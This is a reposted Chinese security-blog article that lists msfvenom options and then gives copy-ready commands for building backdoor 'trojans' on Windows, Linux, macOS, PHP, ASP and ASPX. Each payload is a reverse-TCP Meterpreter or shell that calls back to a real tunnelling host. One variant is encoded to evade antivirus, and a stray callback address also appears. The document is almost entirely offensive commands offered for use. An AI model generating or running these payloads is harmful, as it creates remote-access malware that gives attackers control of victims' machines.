【后门攻击】后门生成模块免杀

admin 2022年1月10日03:30:41评论14 views字数 1233阅读4分6秒阅读模式

从后面生成模块到权限维持基本命令

  • 命令参数解释

    • -p、-payload 指定payload

    • –list payloads 列出可以设置的payload选项

    • -l、-list 列出可用项

    • -n 指定nop在payload的数量

    • -f 指定文件输出格式

    • –list formats 列出可用输出格式

    • e、-encoder 指定使用编码器

    • –list encoders 查看可用的编码器

    • -a,–arch 指定目标系统架构

    • –platform 指定目标系统

    • –list platform 查看可用的目标系统

    • -s 未经编码的payload的最大长度

    • –encoder-space 编码后的payload最大长度

    • -b 设置在paylaod中避免出现的字符

    • -i 设置payload的编码次数

    • -c 、–add-code 包含额外的win32 shellcode文件

    • -x、–template 指定特定可执行文件作为模板

    • -k、–keep 保护模板的功能、注入的payload作为 一个新的进程运行

    • -o 保存paylaod到文件

    • -v 指定变量名

ad39402345.wicp.vip:26240

常见后门生成方式

  • 一、windows

    • 命令:msfvenom -a x64 –platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木马名称.exe

    • msfvenom -a x64 –platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -e x86/shikata_ga_nai -i 3 -f exe -o 木马名称.exe

  • 二、Linux

    • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f elf -o 木马名称.elf

  • 三、MAC

    • msfvenom -p osx/x86/shell_reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f macho -o 木马名称.macho

  • 四、PHP

    • msfvenom -p php/x86/meterpreter_reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f raw -o 木马名称.php

  • 五、ASP

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f asp -o 木马名称.asp

  • 六、ASPX

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f aspx -o 木马名称.aspx

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:30:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【后门攻击】后门生成模块免杀http://cn-sec.com/archives/729933.html

发表评论

匿名网友 填写信息